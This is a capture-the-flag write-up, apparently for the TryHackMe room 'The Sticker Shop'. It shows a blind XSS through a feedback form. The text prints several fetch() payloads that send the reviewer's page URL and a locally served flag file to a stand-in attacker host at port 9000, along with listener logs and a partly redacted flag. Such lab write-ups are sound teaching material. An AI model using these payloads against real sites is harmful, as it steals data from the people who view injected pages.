###### tags: `ctf` `thm` `writeUP` `web` `XSS`

## The Sticker Shop

https://tryhackme.com/r/room/thestickershop

First, I started a web server on port 9000 on my attack machine to catch callbacks:

```shell
python3 -m http.server 9000
```

Then I submitted a test script through the feedback form:

```html
<script>fetch('http://Attacker_IPAddr:9000/index.php')</script>
```

The listener received the request, so the feedback is rendered unescaped and the script runs in the browser of whoever reviews it (a blind XSS). The 404 is expected: the listener has no `index.php`, the hit itself is the result.

```shell
└─$ python3 -m http.server 9000
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
10.10.30.220 - - [20/Jan/2025 05:58:28] code 404, message File not found
10.10.30.220 - - [20/Jan/2025 05:58:28] "GET /index.php HTTP/1.1" 404 -
10.10.30.220 - - [20/Jan/2025 05:58:39] code 404, message File not found
10.10.30.220 - - [20/Jan/2025 05:58:39] "GET /index.php HTTP/1.1" 404 -
```

Next, I checked which URL the staff use to review the messages by exfiltrating `window.location.href` (the `cookie=` parameter name is just a label; the value is the page URL, Base64-encoded so it survives the query string):

```html
<script>fetch('http://Attacker_IPAddr:9000/steal?cookie=' + btoa(window.location.href));</script>
```

Decoding the value shows that the reviewer opens the feedback page on localhost: `http://127.0.0.1:8080/view_feedback`.

```shell
10.10.30.220 - - [20/Jan/2025 07:17:13] code 404, message File not found
10.10.30.220 - - [20/Jan/2025 07:17:13] "GET /steal?cookie=aHR0cDovLzEyNy4wLjAuMTo4MDgwL3ZpZXdfZmVlZGJhY2s= HTTP/1.1" 404 -
^C
Keyboard interrupt received, exiting.

┌──(kali㉿kali)-[~]
└─$ echo "aHR0cDovLzEyNy4wLjAuMTo4MDgwL3ZpZXdfZmVlZGJhY2s=" | base64 -d
http://127.0.0.1:8080/view_feedback
```

Since the reviewer's browser runs on the same host and origin as the shop, a `fetch('http://127.0.0.1:8080/flag.txt')` from the injected script is same-origin and the response body can be read. Now we can create a script that reads the flag file and sends its contents to the listener as a Base64 string. Note that `await` at the top level is only valid in module scripts, so in a plain inline `<script>` it has to be wrapped in an `async` function; the first and third variants below do that (the original one-liners used bare `await` and would fail to parse). The `/start` and `/end` beacons only serve to show whether the script ran at all.

```html
<script>
(async () => {
  fetch('http://Attacker_IPAddr:9000/start');                 // script started
  const response = await fetch('http://127.0.0.1:8080/flag.txt'); // same-origin read
  const text = await response.text();
  fetch('http://Attacker_IPAddr:9000/?' + btoa(text));        // exfiltrate as Base64
  fetch('http://Attacker_IPAddr:9000/end');                   // script finished
})();
</script>
```

A promise-chain variant that also reports a non-2xx status or a thrown error back to the listener, so "no XSS" can be told apart from "no flag":

```html
<script>
fetch("http://127.0.0.1:8080/flag.txt")
  .then(response => {
    if (!response.ok) {
      fetch('http://Attacker_IPAddr:9000/notok');             // flag URL answered, but not 2xx
      throw new Error(`HTTP error! Status: ${response.status}`);
    }
    return response.text();                                   // read response as text
  })
  .then(data => {
    fetch('http://Attacker_IPAddr:9000/?' + btoa(data));      // send the flag Base64-encoded
  })
  .catch(error => {
    fetch('http://Attacker_IPAddr:9000/' + `Error: ${error.message}`);
    // only meaningful if the reviewed page has an element with id="content";
    // guarded so a missing element does not throw inside the catch handler
    const el = document.getElementById("content");
    if (el) el.textContent = `Error: ${error.message}`;
  });
</script>
```

And the minimal version:

```html
<script>
(async () => {
  let response = await fetch('http://127.0.0.1:8080/flag.txt');
  let text = await response.text();
  fetch('http://Attacker_IPAddr:9000/?' + btoa(text));
})();
</script>
```

This gives a positive result. The `base64: invalid input` at the end is only the trailing space I pasted inside the quotes; GNU `base64 -d` prints the decoded data and then complains about the stray byte.

```shell
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 9000
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
10.10.30.220 - - [20/Jan/2025 07:20:29] "GET /?VEhNezgzNzg5YTY5M...........3OWNmY2FiZThiNjIzMDVlZTZ9 HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.

┌──(kali㉿kali)-[~]
└─$ echo "VEhNezgzNzg5YTY5MDc0ZjY.........WNmY2FiZThiNjIzMDVlZTZ9 " | base64 -d
THM{83789a690.......e8b62305ee6}base64: invalid input
```

The key is:

```
THM{83789a69074f.....05ee6}
```